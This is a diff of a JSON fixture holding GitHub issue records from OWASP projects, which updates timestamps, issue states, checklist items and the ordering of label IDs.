description to this project", "body": "", @@ -2988,7 +2988,7 @@ "pk": 100, "fields": { "nest_created_at": "2024-09-11T19:25:13.295Z", - "nest_updated_at": "2024-09-18T17:37:15.987Z", + "nest_updated_at": "2024-09-22T15:43:42.477Z", "node_id": "I_kwDOHGPq186BytNV", "title": "Please add a description to this project", "body": "", @@ -3044,7 +3044,7 @@ "pk": 102, "fields": { "nest_created_at": "2024-09-11T19:25:31.779Z", - "nest_updated_at": "2024-09-18T17:37:30.176Z", + "nest_updated_at": "2024-09-22T15:44:01.129Z", "node_id": "I_kwDOG95VyM5Gn28w", "title": "ADD CI/CD for the package ", "body": "We need CI/CD pipeline for the package for following proper SDLC", @@ -3190,7 +3190,7 @@ "pk": 107, "fields": { "nest_created_at": "2024-09-11T19:25:41.059Z", - "nest_updated_at": "2024-09-18T17:37:34.219Z", + "nest_updated_at": "2024-09-22T15:44:06.714Z", "node_id": "I_kwDOG95PUM5H45x_", "title": "Adding OTP Verification UI", "body": "", @@ -3218,7 +3218,7 @@ "pk": 108, "fields": { "nest_created_at": "2024-09-11T19:25:58.098Z", - "nest_updated_at": "2024-09-18T17:37:48.126Z", + "nest_updated_at": "2024-09-22T15:44:27.392Z", "node_id": "I_kwDOG2VVl86BytMG", "title": "Please add a description to this project", "body": "", @@ -3246,7 +3246,7 @@ "pk": 109, "fields": { "nest_created_at": "2024-09-11T19:26:10.299Z", - "nest_updated_at": "2024-09-18T17:37:56.988Z", + "nest_updated_at": "2024-09-22T15:44:38.361Z", "node_id": "I_kwDOGwIlcs6TvxGu", "title": "Dependency Dashboard", "body": "This issue lists Renovate updates and detected dependencies. Read the [Dependency Dashboard](https://docs.renovatebot.com/key-concepts/dashboard/) docs to learn more.\n\nThis repository currently has no open or pending branches.\n\n## Detected dependencies\n\n
regex\n
\n\n
info.md\n\n - `corazawaf/coraza 3.2.1`\n\n
\n\n
\n
\n\n---\n\n- [ ] Check this box to trigger a request for Renovate to run again on this repository\n\n", @@ -3274,7 +3274,7 @@ "pk": 110, "fields": { "nest_created_at": "2024-09-11T19:26:14.303Z", - "nest_updated_at": "2024-09-18T17:38:00.313Z", + "nest_updated_at": "2024-09-22T15:44:43.160Z", "node_id": "I_kwDOGwIRCM5Rx9gw", "title": "Supply Chain Management section doesn't focus on the \"management\"", "body": "As a small improvement, I believe the supply chain management section should look into the \"management\" of the supply chain, more than the continuous scanning that is mentioned in the implementation phase. This section _should_ focus more around the inventory of applications and services that are deployed/being-used/etc (*BOMs are the direct example here) and the ability to go through them to understand what you have, and what you can filter whenever a need comes up (you need to search for a CVE, you need to understand how many apps use a specific library, etc.)", @@ -3302,7 +3302,7 @@ "pk": 111, "fields": { "nest_created_at": "2024-09-11T19:26:40.955Z", - "nest_updated_at": "2024-09-18T17:38:21.967Z", + "nest_updated_at": "2024-09-22T15:45:13.644Z", "node_id": "I_kwDOGdcO-85AVcdr", "title": "Layout issue", "body": "The page build failed for the `main` branch with the following error:\r\n\r\nA file was included in `/_layouts/col-sidebar.html` that is a symlink or does not exist in your `_includes` directory. \r\n\r\n\r\nThe page build failed for the `main` branch with the following error:\r\n\r\nThe tag `https` on line 52 in `index.md` is not a recognized Liquid tag", @@ -3518,9 +3518,9 @@ 59 ], "labels": [ - 35, 40, - 41 + 41, + 35 ] } }, @@ -3552,10 +3552,10 @@ 59 ], "labels": [ - 35, 40, 41, - 42 + 42, + 35 ] } }, @@ -3587,9 +3587,9 @@ 59 ], "labels": [ - 35, 40, - 41 + 41, + 35 ] } }, @@ -3621,9 +3621,9 @@ 59 ], "labels": [ - 35, 40, - 41 + 41, + 35 ] } }, @@ -3655,9 +3655,9 @@ 59 ], "labels": [ - 38, 40, - 41 + 41, + 38 ] } }, @@ -3689,8 +3689,8 @@ 59 ], "labels": [ - 38, - 43 + 43, + 38 ] } }, @@ -3758,9 +3758,9 @@ 59 ], "labels": [ - 38, 40, - 45 + 45, + 38 ] } }, @@ -3792,9 +3792,9 @@ 60 ], "labels": [ + 46, 38, - 39, - 46 + 39 ] } }, @@ -3826,9 +3826,9 @@ 59 ], "labels": [ + 47, 38, - 39, - 47 + 39 ] } }, @@ -3893,8 +3893,8 @@ 59 ], "labels": [ - 35, - 43 + 43, + 35 ] } }, @@ -3959,8 +3959,8 @@ 59 ], "labels": [ - 46, - 48 + 48, + 46 ] } }, @@ -3992,8 +3992,8 @@ 59 ], "labels": [ - 35, 42, + 35, 44 ] } @@ -4026,9 +4026,9 @@ 59 ], "labels": [ - 35, 40, - 42 + 42, + 35 ] } }, @@ -4060,8 +4060,8 @@ 59 ], "labels": [ - 35, 42, + 35, 44 ] } @@ -4094,10 +4094,10 @@ 59 ], "labels": [ - 35, - 38, + 43, 42, - 43 + 35, + 38 ] } }, @@ -4163,8 +4163,8 @@ 59 ], "labels": [ - 35, - 42 + 42, + 35 ] } }, @@ -4228,8 +4228,8 @@ 59 ], "labels": [ - 35, - 42 + 42, + 35 ] } }, @@ -4261,9 +4261,9 @@ 59 ], "labels": [ + 42, 35, - 38, - 42 + 38 ] } }, @@ -4327,8 +4327,8 @@ 59 ], "labels": [ - 35, - 42 + 42, + 35 ] } }, @@ -4424,8 +4424,8 @@ 59 ], "labels": [ - 38, - 48 + 48, + 38 ] } }, @@ -4457,8 +4457,8 @@ 59 ], "labels": [ - 37, - 42 + 42, + 37 ] } }, @@ -4490,8 +4490,8 @@ 59 ], "labels": [ - 42, - 48 + 48, + 42 ] } }, @@ -4523,8 +4523,8 @@ 59 ], "labels": [ - 42, - 48 + 48, + 42 ] } }, @@ -4556,8 +4556,8 @@ 59 ], "labels": [ - 35, - 42 + 42, + 35 ] } }, @@ -4814,8 +4814,8 @@ 59 ], "labels": [ - 44, - 48 + 48, + 44 ] } }, @@ -4847,8 +4847,8 @@ 59 ], "labels": [ - 37, - 44 + 44, + 37 ] } }, @@ -4880,8 +4880,8 @@ 59 ], "labels": [ - 35, - 42 + 42, + 35 ] } }, @@ -4918,7 +4918,7 @@ "pk": 160, "fields": { "nest_created_at": "2024-09-11T19:29:59.579Z", - "nest_updated_at": "2024-09-18T17:39:41.411Z", + "nest_updated_at": "2024-09-22T15:47:00.391Z", "node_id": "I_kwDOGDKlFs5mts0i", "title": "provide pdf and epub", "body": "We provide pdf and epub versions of the document in the [OWASP Developer Guide](https://owasp.org/www-project-developer-guide/) as part of the commit workflow\r\n\r\nThis can be done for the OTMP as well if this is useful", @@ -6912,23 +6912,23 @@ "pk": 227, "fields": { "nest_created_at": "2024-09-11T19:31:56.017Z", - "nest_updated_at": "2024-09-11T19:31:56.017Z", + "nest_updated_at": "2024-09-22T19:24:52.919Z", "node_id": "I_kwDOF9wO7c6Tszn8", "title": "python cre.py --upstream_sync - ModuleNotFoundError: No module named 'click'", "body": "## Issue\r\n\r\n### **What is the issue?**\r\n\r\nAfter **make install** should there be an instruction to run **pip install -r requirements.txt** ?\r\n\r\n### Expected Behaviour\r\n\r\nWhat should have happened?\r\n\r\nRequirements should be installed and the command **python cre.py --upstream_sync** should not produce an error.\r\n\r\n### Actual Behaviour\r\n\r\nWhat actually happened?\r\n\r\nWhen running \r\n\r\nGetting: **ModuleNotFoundError: No module named 'click'**\r\n\r\nHow can we reproduce the error?\r\n\r\nSet up a new project and follow steps as outlined in README", "summary": "The issue revolves around encountering a \"ModuleNotFoundError\" for the 'click' module when executing the command \"python cre.py --upstream_sync\" after running \"make install.\" The user suggests that there should be an instruction to run \"pip install -r requirements.txt\" following the installation process to ensure all necessary dependencies are installed. The expectation is that the command should work without errors if the requirements are properly addressed.", "hint": "To approach the problem of the `ModuleNotFoundError: No module named 'click'` error when running the command `python cre.py --upstream_sync`, you can follow these steps:\n\n1. **Check the README Documentation**: Review the README file of your project to see if there are any specific instructions regarding dependencies or installation steps that you may have overlooked.\n\n2. **Verify Python and Pip Installation**: Ensure that Python and pip are correctly installed on your system. You can check their versions by running `python --version` and `pip --version` in your terminal.\n\n3. **Locate requirements.txt**: Identify the location of the `requirements.txt` file in your project directory to confirm that it exists and is accessible.\n\n4. **Install Requirements**: Run `pip install -r requirements.txt` in your terminal to install all required packages listed in the requirements file. This will typically include the `click` module if it is specified.\n\n5. **Check Virtual Environment**: If you are using a virtual environment, ensure it is activated before running installation commands or the `cre.py` script. You can activate it with `source venv/bin/activate` (Linux/Mac) or `venv\\Scripts\\activate` (Windows).\n\n6. **Inspect Installed Packages**: After installation, check if the `click` module is installed by running `pip list | grep click` to confirm its presence.\n\n7. **Re-run the Command**: Attempt to run the original command `python cre.py --upstream_sync` again to see if the issue persists after installing the required packages.\n\n8. **Check for Typos**: Ensure there are no typos in the import statements in `cre.py` that might be causing the module not to be found.\n\n9. **Upgrade Pip**: If the error persists, consider upgrading pip to the latest version using `pip install --upgrade pip`, as an outdated version might cause issues with package installations.\n\n10. **Consult Project Contributors or Community**: If all else fails, reach out to the project's contributors or community (e.g., forums, GitHub issues) for assistance, as they may have encountered the same issue.", - "state": "open", - "state_reason": "", + "state": "closed", + "state_reason": "completed", "url": "https://github.com/OWASP/OpenCRE/issues/551", "number": 551, "sequence_id": 2477996540, "is_locked": false, "lock_reason": "", - "comments_count": 0, - "closed_at": null, + "comments_count": 1, + "closed_at": "2024-09-21T15:10:44Z", "created_at": "2024-08-21T13:05:40Z", - "updated_at": "2024-08-21T13:05:40Z", + "updated_at": "2024-09-21T15:10:44Z", "author": 73, "repository": 333, "assignees": [], @@ -6972,7 +6972,7 @@ "pk": 229, "fields": { "nest_created_at": "2024-09-11T19:32:01.930Z", - "nest_updated_at": "2024-09-18T17:40:10.847Z", + "nest_updated_at": "2024-09-22T15:47:44.399Z", "node_id": "I_kwDOF9sgec4852Zl", "title": "images", "body": "![logo](https://user-images.githubusercontent.com/89657173/136672956-dc3689fb-106d-4803-9768-32130ab2f33f.png)\r\n", @@ -7146,10 +7146,10 @@ "pk": 235, "fields": { "nest_created_at": "2024-09-11T19:35:23.243Z", - "nest_updated_at": "2024-09-18T17:42:50.647Z", + "nest_updated_at": "2024-09-22T15:51:30.934Z", "node_id": "I_kwDOFOM8vs56Di1G", "title": "Hold MTG #22: 2024/10", - "body": "- [x] fix the date\n- [ ] announce the meeting on the page\n- [ ] make connpass event\n- [ ] spread the word\n- [ ] hold the meeting\n- [ ] archive the announcement\n", + "body": "- [x] fix the date\n- [x] announce the meeting on the page\n- [x] make connpass event\n- [ ] spread the word\n- [ ] hold the meeting\n- [ ] archive the announcement\n", "summary": "", "hint": "", "state": "open", @@ -7162,7 +7162,7 @@ "comments_count": 0, "closed_at": null, "created_at": "2023-12-19T01:18:25Z", - "updated_at": "2024-08-22T14:32:10Z", + "updated_at": "2024-09-18T18:33:55Z", "author": 79, "repository": 393, "assignees": [], @@ -7202,7 +7202,7 @@ "pk": 237, "fields": { "nest_created_at": "2024-09-11T19:35:34.620Z", - "nest_updated_at": "2024-09-18T17:42:59.415Z", + "nest_updated_at": "2024-09-22T15:51:44.652Z", "node_id": "I_kwDOFLkrvc55lLR7", "title": "2 typos \"prvilege requried \" -> \"privilege required \"", "body": "In line \"Note: Let’s call the Critical/High vulnerabilities with no prvilege requried and minimal user interaction as ‘OneClick’.\"\r\n\r\nhttps://github.com/OWASP/www-project-desktop-app-security-top-10/blob/435a699e590c8440e5592d1bfe32c682fd9b68d0/tab_severitybasedranking.md?plain=1#L16", @@ -8309,7 +8309,7 @@ "pk": 273, "fields": { "nest_created_at": "2024-09-11T19:37:06.496Z", - "nest_updated_at": "2024-09-18T19:01:29.362Z", + "nest_updated_at": "2024-09-22T19:23:08.591Z", "node_id": "I_kwDOFAM8Ps6VvOKo", "title": "docker in running on VM not accesibe Using Host Machine", "body": "**If You're running this docker container on your Ubuntu VM and not able to access using Host machine using ip-address (Ex. 192.168.10.6)**\r\n\r\n- [x] #Do the Following\r\n - First Stop the container using (CTRL+C)\r\n - Open docker-compose.yml and modify the two things \r\n - `crapi-web` service: Under `crapi-web` modify the `ports` sections\r\n - \"0.0.0.0:8888:80\"\r\n - \"0.0.0.0:8888:80\"\r\n - `mailhog` service: modify the `ports` sections\r\n - \"0.0.0.0:8025:8025\"\r\n \r\n **If you have any doubt, referrer the image:**\r\n \r\n \r\n![image](https://github.com/user-attachments/assets/58075994-4ae5-461f-96a1-ffdc4f2981bd)\r\n\r\n![image](https://github.com/user-attachments/assets/128c382c-2644-4c70-aa4f-39ab11f8decc)\r\n", @@ -8395,10 +8395,10 @@ "pk": 276, "fields": { "nest_created_at": "2024-09-11T19:38:23.850Z", - "nest_updated_at": "2024-09-18T19:08:24.331Z", + "nest_updated_at": "2024-09-22T19:44:03.665Z", "node_id": "I_kwDOEyybVc6Jubpf", "title": "🧚🤖 Pixeebot Activity Dashboard", - "body": "\"DashList\"\n👋 This dashboard summarizes my activity on the repository, including available improvement opportunities.\n\n\n## Recommendations\n_Last analysis: Sep 11 | Next scheduled analysis: Sep 18_\n\n### Open\n\n ✅ Nice work, you're all caught up!\n\n\n### Available\n\n ✅ Nothing yet, but I'm continuing to monitor your PRs.\n\n\n### Completed\n✅ You merged improvements I recommended [View](https://github.com/OWASP/cornucopia/pulls?q=is%3Apr+is%3Amerged+author%3Aapp%2Fpixeebot)\n✅ I also hardened PRs for you [View](https://github.com/OWASP/cornucopia/pulls?q=%22Hardening+Suggestion%22+in%3Atitle+is%3Apr+author%3Aapp%2Fpixeebot+is%3Amerged+head%3Apixeebot%2F)\n\n## Metrics\n**What would you like to see here?** [Let us know!](https://tally.so/r/mYa4Y5)\n\n## Resources\n\n📚 **Quick links**\nPixee Docs | Codemodder by Pixee\n\n🧰 **Tools I work with**\n[SonarCloud](https://docs.pixee.ai/code-scanning-tools/sonar) | [SonarQube](https://docs.pixee.ai/code-scanning-tools/sonarqube) | [CodeQL](https://docs.pixee.ai/code-scanning-tools/codeql) | [Semgrep](https://docs.pixee.ai/code-scanning-tools/semgrep)\n\n🚀 **Pixee CLI**\nThe power of my codemods in your local development environment. [Learn more](https://github.com/pixee/pixee-cli)\n\n💬 **Reach out**\nFeedback | Support\n\n---\n\n❤️ Follow, share, and engage with Pixee: GitHub | [LinkedIn](https://www.linkedin.com/company/pixee/) | [Slack](https://pixee-community.slack.com/signup#/domain-signup)\n\n\n ![](https://d1zaessa2hpsmj.cloudfront.net/pixel/v1/track?writeKey=2PI43jNm7atYvAuK7rJUz3Kcd6A&event=ACTIVITY_DASHBOARD%7COWASP%2Fcornucopia%7CACTIVITY_DASHBOARD)\n\n", + "body": "\"DashList\"\n👋 This dashboard summarizes my activity on the repository, including available improvement opportunities.\n\n\n## Recommendations\n_Last analysis: Sep 19 | Next scheduled analysis: Sep 26_\n\n### Open\n\n ✅ Nice work, you're all caught up!\n\n\n### Available\n\n ✅ Nothing yet, but I'm continuing to monitor your PRs.\n\n\n### Completed\n✅ You merged improvements I recommended [View](https://github.com/OWASP/cornucopia/pulls?q=is%3Apr+is%3Amerged+author%3Aapp%2Fpixeebot)\n✅ I also hardened PRs for you [View](https://github.com/OWASP/cornucopia/pulls?q=%22Hardening+Suggestion%22+in%3Atitle+is%3Apr+author%3Aapp%2Fpixeebot+is%3Amerged+head%3Apixeebot%2F)\n\n## Metrics\n**What would you like to see here?** [Let us know!](https://tally.so/r/mYa4Y5)\n\n## Resources\n\n📚 **Quick links**\nPixee Docs | Codemodder by Pixee\n\n🧰 **Tools I work with**\n[SonarCloud](https://docs.pixee.ai/code-scanning-tools/sonar) | [SonarQube](https://docs.pixee.ai/code-scanning-tools/sonarqube) | [CodeQL](https://docs.pixee.ai/code-scanning-tools/codeql) | [Semgrep](https://docs.pixee.ai/code-scanning-tools/semgrep)\n\n🚀 **Pixee CLI**\nThe power of my codemods in your local development environment. [Learn more](https://github.com/pixee/pixee-cli)\n\n💬 **Reach out**\nFeedback | Support\n\n---\n\n❤️ Follow, share, and engage with Pixee: GitHub | [LinkedIn](https://www.linkedin.com/company/pixee/) | [Slack](https://pixee-community.slack.com/signup#/domain-signup)\n\n\n ![](https://d1zaessa2hpsmj.cloudfront.net/pixel/v1/track?writeKey=2PI43jNm7atYvAuK7rJUz3Kcd6A&event=ACTIVITY_DASHBOARD%7COWASP%2Fcornucopia%7CACTIVITY_DASHBOARD)\n\n", "summary": "The activity dashboard provides an overview of the repository's current status, indicating that all tasks are up to date and there are no outstanding improvement opportunities at this time. Recent analyses highlight completed merges and hardening suggestions made by the bot, with ongoing monitoring of pull requests. Users are encouraged to provide feedback on what additional metrics they would like to see included in the dashboard.", "hint": "To effectively approach the problem of improving your activity on the repository using the Pixeebot Activity Dashboard, you can follow these possible steps:\n\n1. **Review Dashboard Metrics**: Carefully examine the current activity metrics provided in the dashboard to understand your recent contributions and areas of improvement.\n\n2. **Identify Improvement Opportunities**: Look for any specific recommendations or potential enhancements suggested by the Pixeebot to guide your next actions.\n\n3. **Monitor Open Pull Requests (PRs)**: Keep track of any open PRs that might require your attention or further action, ensuring they adhere to the recommended improvements.\n\n4. **Analyze Merged PRs**: Review the PRs that have already been merged, especially the ones where improvements were suggested by Pixeebot, to understand what worked well.\n\n5. **Utilize Available Tools**: Leverage the tools listed in the dashboard (SonarCloud, SonarQube, CodeQL, Semgrep) to perform static code analysis and identify potential issues in your codebase.\n\n6. **Engage with Resources**: Refer to the Pixee Docs and Codemodder resources for guidance on best practices and specific commands or configurations that can enhance your development process.\n\n7. **Implement Feedback**: If there's feedback from previous analyses, take the time to address those areas and implement any necessary changes in your code.\n\n8. **Plan for Next Analysis**: Prepare for the next scheduled analysis by setting goals on what you want to accomplish or improve before September 18.\n\n9. **Reach Out for Support**: If you encounter challenges or need clarification on certain recommendations, utilize the provided support channels, such as email or feedback links.\n\n10. **Engage with the Community**: Follow and participate in discussions on platforms like GitHub and Slack to gain insights from other developers and share your experiences with Pixeebot.\n\nBy following these steps, you can enhance your activity on the repository and leverage the resources provided by Pixeebot effectively.", "state": "open", @@ -8411,7 +8411,7 @@ "comments_count": 0, "closed_at": null, "created_at": "2024-05-22T14:10:16Z", - "updated_at": "2024-09-11T03:50:49Z", + "updated_at": "2024-09-19T07:34:38Z", "author": null, "repository": 425, "assignees": [], @@ -8563,7 +8563,7 @@ "pk": 282, "fields": { "nest_created_at": "2024-09-11T19:39:37.166Z", - "nest_updated_at": "2024-09-18T17:45:16.940Z", + "nest_updated_at": "2024-09-22T16:24:12.671Z", "node_id": "I_kwDOEdhCDs47aYqV", "title": "Include a list of threat modeling methodologies", "body": "As part of the selecting a methodology step", @@ -8929,7 +8929,7 @@ "pk": 294, "fields": { "nest_created_at": "2024-09-11T19:40:14.558Z", - "nest_updated_at": "2024-09-18T17:45:36.075Z", + "nest_updated_at": "2024-09-22T16:24:39.466Z", "node_id": "I_kwDOEZvT985B4hvR", "title": "bug: acurl command bug", "body": "error msg:\r\n```\r\n~ ❯❯❯ acurl http://localhost:8000/DescribeIpReport\r\nTraceback (most recent call last):\r\n File \"gurl/__main__.py\", line 32, in \r\n main()\r\n File \"gurl/__main__.py\", line 20, in main\r\n res = gurl.parse_curl_trace(f.read())\r\n File \"/venv/lib/python3.8/site-packages/gurl/__init__.py\", line 104, in parse_curl_trace\r\n reqres[\"_meta\"][\"curl_log\"] = log\r\nTypeError: 'NoneType' object is not subscriptable\r\n~ ❯❯❯\r\n```", @@ -8957,7 +8957,7 @@ "pk": 295, "fields": { "nest_created_at": "2024-09-11T19:40:32.779Z", - "nest_updated_at": "2024-09-18T19:01:34.171Z", + "nest_updated_at": "2024-09-22T19:23:20.258Z", "node_id": "I_kwDOEWezOc5wUjF7", "title": "Is this initiative still active?", "body": "Haven't seen updates since 2021. I've been looking for uses of ontology to derive threats from descriptions of infrastructure. This one at least derives them from DFDs, but in Threat Dragon format. ", @@ -9140,7 +9140,7 @@ "pk": 301, "fields": { "nest_created_at": "2024-09-11T19:41:27.003Z", - "nest_updated_at": "2024-09-18T18:55:11.060Z", + "nest_updated_at": "2024-09-22T18:42:56.225Z", "node_id": "I_kwDOETRnAc5Jz1RE", "title": "Add hardcoded encryption key on top of a secret.", "body": "Have a challenge about \"bad encryption practices\" where we hardocde the key and the secret in java.\r\n\r\nSteps to take:\r\n\r\n- create a secret on your computer\r\n- encrypt it with your algorithm of choice (could be AES, 3DES, whatever you like) on your computer resulting in the ciphertext you need\r\n- now take the ciphertext and put that in the java code of the challenge\r\n- add the key you used to encrypt the challenge and a decryption method to the challenge. See contributing.md on how to create the challenge.", @@ -9813,7 +9813,7 @@ "pk": 322, "fields": { "nest_created_at": "2024-09-11T19:43:35.817Z", - "nest_updated_at": "2024-09-18T19:01:51.575Z", + "nest_updated_at": "2024-09-22T19:23:51.312Z", "node_id": "I_kwDOERPzhs6EXuue", "title": "Field \"Vulnerability Mapping\"", "body": "Hi,\r\n\r\nIt is normal that I do not found the field **Vulnerability Mapping** in the JSON returned?\r\n\r\n👀 View from the web:\r\n![image](https://github.com/OWASP/cwe-tool/assets/1573775/35fdbc3c-c48d-4820-8431-da2f47a848ef)\r\n\r\n👀 View from the JSON:\r\n![image](https://github.com/OWASP/cwe-tool/assets/1573775/0110bf3b-04c5-4c36-a345-70bcce48df54)\r\n\r\n📖 JSON file:\r\n[cwe.json](https://github.com/OWASP/cwe-tool/files/14839275/cwe.json)\r\n\r\n💻 Version used:\r\n![image](https://github.com/OWASP/cwe-tool/assets/1573775/d44efe13-0c23-4b3c-a982-fb4deeae2da6)\r\n\r\n🤔 Did I miss something?\r\n\r\n😉 Thanks a lot in advance for your help.\r\n\r\n\r\n", @@ -9841,7 +9841,7 @@ "pk": 323, "fields": { "nest_created_at": "2024-09-11T19:44:18.875Z", - "nest_updated_at": "2024-09-18T17:47:00.555Z", + "nest_updated_at": "2024-09-22T16:26:59.918Z", "node_id": "I_kwDOEQbdus5_PwOh", "title": "Website shows ancient WIP Draft Chapter Policy", "body": "When browsing on the OWASP website (owasp.org) and you browse to chapter policies\r\n\r\nAbout->Policies\r\n\r\nThen select [Chapters Policy](https://owasp.org/www-policy/operational/chapters)\r\n\r\nYou will notice on the top right a \"next\" selection entitled \"Chapters Policy - Draft (WIP)\"\r\n\r\nWhen selecting this entry you will be sent to a page that is out of date and states:\r\n\r\n\"Members are invited to provide feedback on this draft policy until January 22, 1970\"\r\n\r\nThis page needs to be removed or at least updated.", @@ -9893,9 +9893,9 @@ 43 ], "labels": [ - 71, 72, - 73 + 73, + 71 ] } }, @@ -9925,8 +9925,8 @@ "repository": 502, "assignees": [], "labels": [ - 71, - 73 + 73, + 71 ] } }, @@ -9956,9 +9956,9 @@ "repository": 502, "assignees": [], "labels": [ - 71, 72, - 73 + 73, + 71 ] } }, @@ -10019,8 +10019,8 @@ "repository": 502, "assignees": [], "labels": [ - 71, - 76 + 76, + 71 ] } }, @@ -10050,8 +10050,8 @@ "repository": 502, "assignees": [], "labels": [ - 71, - 75 + 75, + 71 ] } }, @@ -10081,8 +10081,8 @@ "repository": 502, "assignees": [], "labels": [ - 71, - 77 + 77, + 71 ] } }, @@ -10112,10 +10112,10 @@ "repository": 502, "assignees": [], "labels": [ - 71, - 78, + 80, 79, - 80 + 78, + 71 ] } }, @@ -10145,8 +10145,8 @@ "repository": 502, "assignees": [], "labels": [ - 71, - 77 + 77, + 71 ] } }, @@ -10207,10 +10207,10 @@ "repository": 502, "assignees": [], "labels": [ - 71, - 78, 81, - 82 + 82, + 78, + 71 ] } }, @@ -10242,9 +10242,9 @@ 141 ], "labels": [ - 71, 74, - 75 + 75, + 71 ] } }, @@ -10395,8 +10395,8 @@ "repository": 502, "assignees": [], "labels": [ - 71, - 77 + 77, + 71 ] } }, @@ -10426,8 +10426,8 @@ "repository": 502, "assignees": [], "labels": [ - 71, - 83 + 83, + 71 ] } }, @@ -10457,9 +10457,9 @@ "repository": 502, "assignees": [], "labels": [ - 71, 73, - 84 + 84, + 71 ] } }, @@ -10549,8 +10549,8 @@ "repository": 502, "assignees": [], "labels": [ - 71, - 85 + 85, + 71 ] } }, @@ -10580,9 +10580,9 @@ "repository": 502, "assignees": [], "labels": [ - 71, 85, - 86 + 86, + 71 ] } }, @@ -10614,8 +10614,8 @@ 143 ], "labels": [ - 71, - 77 + 77, + 71 ] } }, @@ -10645,9 +10645,9 @@ "repository": 502, "assignees": [], "labels": [ - 71, 72, - 73 + 73, + 71 ] } }, @@ -10680,10 +10680,10 @@ 146 ], "labels": [ - 71, - 78, 80, - 82 + 82, + 78, + 71 ] } }, @@ -10713,9 +10713,9 @@ "repository": 502, "assignees": [], "labels": [ - 71, 73, - 77 + 77, + 71 ] } }, @@ -10745,9 +10745,9 @@ "repository": 502, "assignees": [], "labels": [ - 71, 73, - 87 + 87, + 71 ] } }, @@ -10779,8 +10779,8 @@ 43 ], "labels": [ - 71, - 80 + 80, + 71 ] } }, @@ -10810,9 +10810,9 @@ "repository": 502, "assignees": [], "labels": [ - 71, + 87, 79, - 87 + 71 ] } }, @@ -10872,8 +10872,8 @@ "repository": 502, "assignees": [], "labels": [ - 71, - 73 + 73, + 71 ] } }, @@ -10905,10 +10905,10 @@ 43 ], "labels": [ - 71, - 75, 83, - 87 + 75, + 87, + 71 ] } }, @@ -10938,8 +10938,8 @@ "repository": 502, "assignees": [], "labels": [ - 71, - 79 + 79, + 71 ] } }, @@ -11006,9 +11006,9 @@ 150 ], "labels": [ - 71, 72, - 73 + 73, + 71 ] } }, @@ -11040,9 +11040,9 @@ 150 ], "labels": [ - 71, 72, - 73 + 73, + 71 ] } }, @@ -11103,9 +11103,9 @@ "repository": 502, "assignees": [], "labels": [ - 71, 75, - 78 + 78, + 71 ] } }, @@ -11135,9 +11135,9 @@ "repository": 502, "assignees": [], "labels": [ + 88, 78, - 81, - 88 + 81 ] } }, @@ -11167,9 +11167,9 @@ "repository": 502, "assignees": [], "labels": [ - 71, 74, - 75 + 75, + 71 ] } }, @@ -11199,8 +11199,8 @@ "repository": 502, "assignees": [], "labels": [ - 71, - 75 + 75, + 71 ] } }, @@ -11233,10 +11233,10 @@ 153 ], "labels": [ - 71, - 78, 80, - 81 + 81, + 78, + 71 ] } }, @@ -11268,9 +11268,9 @@ 43 ], "labels": [ - 71, + 89, 75, - 89 + 71 ] } }, @@ -11302,8 +11302,8 @@ 141 ], "labels": [ - 74, - 88 + 88, + 74 ] } }, @@ -11333,8 +11333,8 @@ "repository": 502, "assignees": [], "labels": [ - 71, - 75 + 75, + 71 ] } }, @@ -11364,9 +11364,9 @@ "repository": 502, "assignees": [], "labels": [ - 71, + 90, 87, - 90 + 71 ] } }, @@ -11396,9 +11396,9 @@ "repository": 502, "assignees": [], "labels": [ - 71, + 91, 78, - 91 + 71 ] } }, @@ -11428,8 +11428,8 @@ "repository": 502, "assignees": [], "labels": [ - 71, - 73 + 73, + 71 ] } }, @@ -11490,8 +11490,8 @@ "repository": 502, "assignees": [], "labels": [ - 73, - 88 + 88, + 73 ] } }, @@ -11523,8 +11523,8 @@ 157 ], "labels": [ - 75, - 88 + 88, + 75 ] } }, @@ -11533,7 +11533,7 @@ "pk": 376, "fields": { "nest_created_at": "2024-09-11T20:09:49.356Z", - "nest_updated_at": "2024-09-18T19:04:54.997Z", + "nest_updated_at": "2024-09-22T19:32:31.654Z", "node_id": "I_kwDOEAWEP86E-6UZ", "title": "Optional entity properties are not shown in reports", "body": "**Describe what problem your feature request solves**:\r\n\r\nSome of the optional entity properties (such as `protocol`, `isEncrypted`, `isPublicNetwork`) can be edited in the diagram editing page but they do not appear in the report page.\r\n\r\n**Describe the solution you'd like**:\r\n\r\nEntity properties are listed with the entity, perhaps between the description and the list of threats.\r\n\r\n**Additional context**:\r\n\r\nHere's a screenshot of something I hacked together showing the properties of one of the data flow entities of the V2 demo model:\r\n\r\n![image](https://github.com/OWASP/threat-dragon/assets/5932424/72092476-beb6-48bb-84ab-2cd64677d17a)\r\n\r\nIf it looks promising, I can finish it off and open a pull request.", @@ -11557,9 +11557,9 @@ ], "labels": [ 71, - 80, 84, - 87 + 87, + 80 ] } }, @@ -11589,8 +11589,8 @@ "repository": 502, "assignees": [], "labels": [ - 71, - 80 + 80, + 71 ] } }, @@ -11620,9 +11620,9 @@ "repository": 502, "assignees": [], "labels": [ - 71, + 83, 75, - 83 + 71 ] } }, @@ -11685,8 +11685,8 @@ ], "labels": [ 80, - 87, - 88 + 88, + 87 ] } }, @@ -11716,8 +11716,8 @@ "repository": 502, "assignees": [], "labels": [ - 71, - 73 + 73, + 71 ] } }, @@ -11749,9 +11749,9 @@ 150 ], "labels": [ - 71, 73, - 83 + 83, + 71 ] } }, @@ -11880,9 +11880,9 @@ 43 ], "labels": [ - 80, + 88, 84, - 88 + 80 ] } }, @@ -11913,8 +11913,8 @@ "assignees": [], "labels": [ 80, - 84, - 88 + 88, + 84 ] } }, @@ -11944,8 +11944,8 @@ "repository": 502, "assignees": [], "labels": [ - 71, - 73 + 73, + 71 ] } }, @@ -11975,9 +11975,9 @@ "repository": 502, "assignees": [], "labels": [ - 71, 73, - 83 + 83, + 71 ] } }, @@ -12041,10 +12041,10 @@ "repository": 502, "assignees": [], "labels": [ - 71, 73, 83, - 87 + 87, + 71 ] } }, @@ -12075,8 +12075,8 @@ "assignees": [], "labels": [ 80, - 83, - 88 + 88, + 83 ] } }, @@ -12106,9 +12106,9 @@ "repository": 502, "assignees": [], "labels": [ + 88, 73, - 83, - 88 + 83 ] } }, @@ -12169,8 +12169,8 @@ "repository": 502, "assignees": [], "labels": [ - 87, - 93 + 93, + 87 ] } }, @@ -12200,10 +12200,10 @@ "repository": 502, "assignees": [], "labels": [ - 80, - 83, + 88, 87, - 88 + 80, + 83 ] } }, @@ -12212,7 +12212,7 @@ "pk": 397, "fields": { "nest_created_at": "2024-09-11T20:10:57.810Z", - "nest_updated_at": "2024-09-18T17:48:14.262Z", + "nest_updated_at": 